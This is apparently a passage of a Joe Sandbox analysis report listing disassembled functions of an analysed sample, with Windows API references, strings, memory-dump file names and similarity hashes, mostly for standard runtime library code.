Function 000000014000ADE0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 1390108997-0
Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340

Function 00007FFE11BD4CD4 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE11BD4E72
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE11BD519B

Strings

csm, xrefs: 00007FFE11BD4E99
csm, xrefs: 00007FFE11BD4E1B
csm, xrefs: 00007FFE11BD4DB9

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction ID: 38ebcf758f21e455bf8843e2b12c82ac45ffe0438c54ca25c7c49d90ceb6568e
Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction Fuzzy Hash: 06E19072908B82CAEB289F36D4406ED77B8EB4576CF146175DA8D57A66CF3CE481C700

Function 00007FFE11BD95BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFE11BD8BC9,?,?,?,?,00007FFE11BD8C14), ref: 00007FFE11BD95CB
FlsSetValue.KERNEL32(?,?,?,00007FFE11BD8BC9,?,?,?,?,00007FFE11BD8C14), ref: 00007FFE11BD9601
FlsSetValue.KERNEL32(?,?,?,00007FFE11BD8BC9,?,?,?,?,00007FFE11BD8C14), ref: 00007FFE11BD962E
FlsSetValue.KERNEL32(?,?,?,00007FFE11BD8BC9,?,?,?,?,00007FFE11BD8C14), ref: 00007FFE11BD963F
FlsSetValue.KERNEL32(?,?,?,00007FFE11BD8BC9,?,?,?,?,00007FFE11BD8C14), ref: 00007FFE11BD9650
SetLastError.KERNEL32(?,?,?,00007FFE11BD8BC9,?,?,?,?,00007FFE11BD8C14), ref: 00007FFE11BD966B

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction ID: bd7a27e2f070f81e870675f82995d8324c6efd3b5ebc77e4bad358c8fa943c26
Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction Fuzzy Hash: 01116A20B0DE42C6FF7CAF2356519B9214A9F497B8F4423B4E83E066F6EE2CE4418301

Function 0000000140013850 Relevance: 9.0, APIs: 6, Instructions: 18synchronizationCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014001385B
LeaveCriticalSection.KERNEL32 ref: 0000000140013872
SetEvent.KERNEL32 ref: 000000014001387F
WaitForSingleObject.KERNEL32 ref: 0000000140013891
CloseHandle.KERNEL32 ref: 000000014001389E
CloseHandle.KERNEL32 ref: 00000001400138AB

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
String ID:
API String ID: 3326452711-0
Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705

Function 0000000140003790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 00000001400037D3
#4.VSELOG ref: 0000000140003823
EnterCriticalSection.KERNEL32 ref: 000000014000382F
LeaveCriticalSection.KERNEL32 ref: 00000001400038B7

Strings

amps_Exec: pHandle=%p, execId=%d, iParam=%d, xrefs: 000000014000380B

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
API String ID: 2984211723-1229430080
Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740

Function 00007FFE11BD7F28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FFE11BD7F4D
GetProcAddress.KERNEL32 ref: 00007FFE11BD7F63
FreeLibrary.KERNEL32 ref: 00007FFE11BD7F8A

Strings

CorExitProcess, xrefs: 00007FFE11BD7F5C
mscoree.dll, xrefs: 00007FFE11BD7F44

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction ID: b5fac9cb4e2fcbc847cddec37bb9d4e3b15a3221f2bb6bb621a516dc6a7fc213
Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction Fuzzy Hash: 2DF0AF61A1EE46C1EB349F22E444BBA6368AF88774F8423F5CA6D462F4CF2CD049C300

Function 0000000140008510 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
ExitProcess.KERNEL32 ref: 0000000140008545

Strings

CorExitProcess, xrefs: 000000014000852A
mscoree.dll, xrefs: 0000000140008518

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID: CorExitProcess$mscoree.dll
API String ID: 75539706-1276376045
Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340

Function 00007FFE11BD40D4 Relevance: 7.8, APIs: 5, Instructions: 290COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 00007FFE11BD41F7
__AdjustPointer.LIBCMT ref: 00007FFE11BD4242

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction ID: 621f3c647fa4e0d8bddfb6a33a1eb3348375656f8822ccbc70dee5cbd5f44c26
Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction Fuzzy Hash: 83B19121A0EE42C1EF79CF579480AF96798AF54BA8F09A4B5DE4C07FA5DE3CE4418700

Function 0000000140009F50 Relevance: 7.7, APIs: 5, Instructions: 208COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 0000000140009F76

Part of subcall function 0000000140008370: Sleep.KERNEL32(?,?,00000000,0000000140005545), ref: 00000001400083C0

GetFileType.KERNEL32 ref: 000000014000A11C

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: FileInfoSleepStartupType
String ID:
API String ID: 1527402494-0
Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301

Function 0000000140009E30 Relevance: 7.6, APIs: 5, Instructions: 74COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E3E
GetLastError.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E5E
GetCommandLineA.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E9B
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009EBB

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CommandLine$ByteCharErrorLastMultiWide
String ID:
API String ID: 3078728599-0
Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00

Function 000000014000FD50 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDAC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDC7

Part of subcall function 0000000140010B30: CreateFileA.KERNEL32 ref: 0000000140010B5A

GetConsoleOutputCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDDC
WideCharToMultiByte.KERNEL32 ref: 000000014000FE0D
WriteConsoleA.KERNEL32 ref: 000000014000FE32

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
String ID:
API String ID: 1850339568-0
Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00

Function 00007FFE11BDFB54 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FFE11BDFB7C
_set_statfp.LIBCMT ref: 00007FFE11BDFB97
_set_statfp.LIBCMT ref: 00007FFE11BDFBB3
_set_statfp.LIBCMT ref: 00007FFE11BDFBEF

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction ID: 27bfc0b6ea7245faeb9adfc84182fb23d283cfd6173a1f6a15c3f95ca300d6cd
Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction Fuzzy Hash: 9311EE32E0CE1785FB7C1916E565BB910495F5C3B8F1426B8F56F862FACE2C9C424302

Function 00007FFE11BD9684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FFE11BD766F,?,?,00000000,00007FFE11BD790A,?,?,?,?,?,00007FFE11BD7896), ref: 00007FFE11BD96A3
FlsSetValue.KERNEL32(?,?,?,00007FFE11BD766F,?,?,00000000,00007FFE11BD790A,?,?,?,?,?,00007FFE11BD7896), ref: 00007FFE11BD96C2
FlsSetValue.KERNEL32(?,?,?,00007FFE11BD766F,?,?,00000000,00007FFE11BD790A,?,?,?,?,?,00007FFE11BD7896), ref: 00007FFE11BD96EA
FlsSetValue.KERNEL32(?,?,?,00007FFE11BD766F,?,?,00000000,00007FFE11BD790A,?,?,?,?,?,00007FFE11BD7896), ref: 00007FFE11BD96FB
FlsSetValue.KERNEL32(?,?,?,00007FFE11BD766F,?,?,00000000,00007FFE11BD790A,?,?,?,?,?,00007FFE11BD7896), ref: 00007FFE11BD970C

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction ID: 5ce6264878a36ac7421cfc3ac5ef52e464ef72f2bc176362d8efbe57c2835277
Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction Fuzzy Hash: 61115C20B0DA42C5FF7C6F27A6519B9214A5F447F8F5563B4E83D466E6FE2CE4418301

Function 00007FFE11BD9518 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FFE11BD9529
FlsSetValue.KERNEL32 ref: 00007FFE11BD9548
FlsSetValue.KERNEL32 ref: 00007FFE11BD9570
FlsSetValue.KERNEL32 ref: 00007FFE11BD9581
FlsSetValue.KERNEL32 ref: 00007FFE11BD9592

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction ID: 022370c24fa1c30db0f9468caae5e791271e097a3c919aabd173a7912d089b6e
Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction Fuzzy Hash: BA11F510A0DA03CAFF7CAE2754529B9118A4F4537CF9426B4D83E4A2F2FE2CB4418202

Function 00007FFE11BD5448 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FFE11BD54B8
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE11BD5503

Strings

RCC, xrefs: 00007FFE11BD54D4
MOC, xrefs: 00007FFE11BD54CC

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction ID: b64dc17145ee91c7f05628812eaa05803efc26e9a481d9f2ad908bc801451696
Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction Fuzzy Hash: 87919C72A08B81CAEB248F66E440AED7BB4FB0479CF10516AEA4D57B65DF3CD191CB00

Function 00007FFE11BD3A38 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE11BD3A63
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE11BD3AFA
RtlUnwindEx.KERNEL32 ref: 00007FFE11BD3B54

Strings

csm, xrefs: 00007FFE11BD3AE1

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction ID: c516842ff22c195be00d71b4290eec53f05df8afd6786cb0db920f7e209133af
Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction Fuzzy Hash: 0751B471B0EA41CADF288F17D444EB87799EB44BACF145170DA4A837A6DE7CE841C700

Function 00007FFE11BD59C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE11BD59F0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE11BD5AD8

Strings

csm, xrefs: 00007FFE11BD5B2A
csm, xrefs: 00007FFE11BD5A12

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction ID: 369c38a7646254f3f96b05048888fe1b5c1e460390735eb5dfe5696bedd820c7
Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction Fuzzy Hash: F6518572508B42CADF788F139444BA877A8EB54BA8F146175DA4D877A5CF3CE451CB01

Function 00007FFE11BD51D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

